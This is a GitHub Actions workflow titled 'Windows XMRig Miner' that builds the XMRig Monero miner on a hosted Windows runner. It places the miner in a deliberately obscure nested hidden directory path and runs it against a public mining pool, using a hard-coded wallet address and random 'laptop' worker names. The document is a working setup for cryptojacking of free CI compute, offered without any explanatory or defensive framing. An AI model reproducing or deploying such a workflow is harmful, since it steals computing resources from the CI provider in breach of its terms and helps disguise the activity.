name: Windows XMRig Miner

on:
  workflow_dispatch:

jobs:
  mine:
    runs-on: windows-latest
    steps:
      - name: Generate random worker name
        id: worker
        run: echo "name=laptop$((Get-Random -Minimum 1 -Maximum 100001))" | Out-File -FilePath $env:GITHUB_OUTPUT -Append

      - name: Install dependencies (CMake, Git, MSBuild)
        run: |
          choco install cmake --installargs 'ADD_CMAKE_TO_PATH=System' -y
          choco install git -y
          choco install visualstudio2022buildtools -y
          refreshenv

      - name: Clone and build XMRig
        run: |
          mkdir -p $env:USERPROFILE\.local\.run\.hello\runner\go\beein\.go\do
          cd $env:USERPROFILE\.local\.run\.hello\runner\go\beein\.go\do
          git clone https://github.com/xmrig/xmrig.git
          cd xmrig
          mkdir build
          cd build
          cmake .. -G "Visual Studio 17 2022" -A x64
          cmake --build . --config Release

      - name: Run XMRig
        run: |
          cd $env:USERPROFILE\.local\.run\.hello\runner\go\beein\.go\do\xmrig\build\Release
          .\xmrig.exe -o pool.supportxmr.com:3333 ^
            -u 46iWdfQ1WgVaJNjPCbVBsnVnzPEjTv8f9ReQTzX4JjCoRsH17PkfXFsCnfcwg1kGmDFD848DJb6QP6mt31SSnrMJ28q1s2p ^
            -p ${{ steps.worker.outputs.name }} ^
            -k --donate-level 1 -t 4
